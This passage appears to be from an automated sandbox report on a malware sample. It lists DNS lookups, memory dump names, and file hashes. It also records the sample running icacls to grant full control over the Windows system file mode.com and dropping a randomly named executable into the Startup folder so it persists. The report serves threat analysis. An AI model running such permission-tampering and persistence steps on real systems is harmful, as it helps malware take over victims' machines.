"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

Network

Country Destination Domain Proto
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp

Files

memory/5108-0-0x00007FFB52733000-0x00007FFB52735000-memory.dmp

memory/5108-1-0x000001CFC4580000-0x000001CFC45A8000-memory.dmp

memory/5108-2-0x00007FFB52730000-0x00007FFB531F1000-memory.dmp

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\DY76wCwbUm.exe

MD5 267bc9803be6b45b13355df903b7732b
SHA1 44dbc73c5829dedced57f8864cbbbebfa8660919
SHA256 0b1077aa343cab3d126e46fcf56e04684cee1a0624a95a71506ee54f910c9698
SHA512 5330008e14d68cf4a9d1f25e33adaa89c9abe4ba35697bb3e88905d8a5307a4e8ddbb4720bfb6df65f098b27dca848eb15792766170d17f75be06ce275dae7c0

memory/5108-1024-0x00007FFB52733000-0x00007FFB52735000-memory.dmp

memory/5108-1140-0x00007FFB52730000-0x00007FFB531F1000-memory.dmp

C:\Windows\System32\mode.com

MD5 5e71c60108a69fee2eb70befab588eb4
SHA1 e2b353bd6783e57a5be29ca339df10ca8d8a7d8c
SHA256 d94fc4c6d404ddb04d00618ea4514dc38d1145b67cfee54ccb3636fd34c81956
SHA512 a298afa4b9c98fd5e95079d369e382da42bee829a3a47e1f1a1080e7d6e51d16ae38443fc8a37dbc52672a0cfc17ae2114142363fdaa8d78929c2390bc67210c

C:\Windows\System32\mode.com

MD5 da0233ab62c02a67b582d38115fa6ddd
SHA1 0aa720bea5e04f285a40928e3f686096e423b2f6
SHA256 6b84f61aa1555bbb042679d6086ecc306e9f0c82210c50013742e09d50c09cba
SHA512 01cd538987de6109ac3d3cdf91411af4cc13e029dda843f4df51e5e9e7a09a92570e0b19237839799ecce28968e031dd2e077d479aa394646e3e292138a07b34

C:\Windows\System32\mode.com

MD5 a7aa614fbab06e2a6db9554139e2175b
SHA1 58e878a6a718d761b46187e0f52b4855d4be5a5f
SHA256 865831bae35944155c6707a65d75ecca2ac7f7d712c9566e032ab23c2b02d066
SHA512 6ccf0f727bcfd876ad83698420f75a4d27b2e02ec7fb2e678d97a128503cb1c5b616694ba9193bbf4af3f107fcb6ed1845375d78c83b6e064b24c3be16c74049

C:\Windows\System32\mode.com

MD5 fc535f0f19ef86f79c16ea39fff476d2
SHA1 a74ebc96290d75d07d56bfa692c0f499aecc5dbd
SHA256 10f641974f22e9f6e9eef4f9c3b8cf69b2267a1b7db61d49a8f7688e6c7673b6
SHA512 e0ef22800bd572e7c111df347e85ef0ab9ed063ddc9a33d99fdbae9ab486b3178d9af16ab2857d1c0f09042713043534f9ddb95e678170d915230d573500ce8c

memory/5108-14136-0x00007FFB52730000-0x00007FFB531F1000-memory.dmp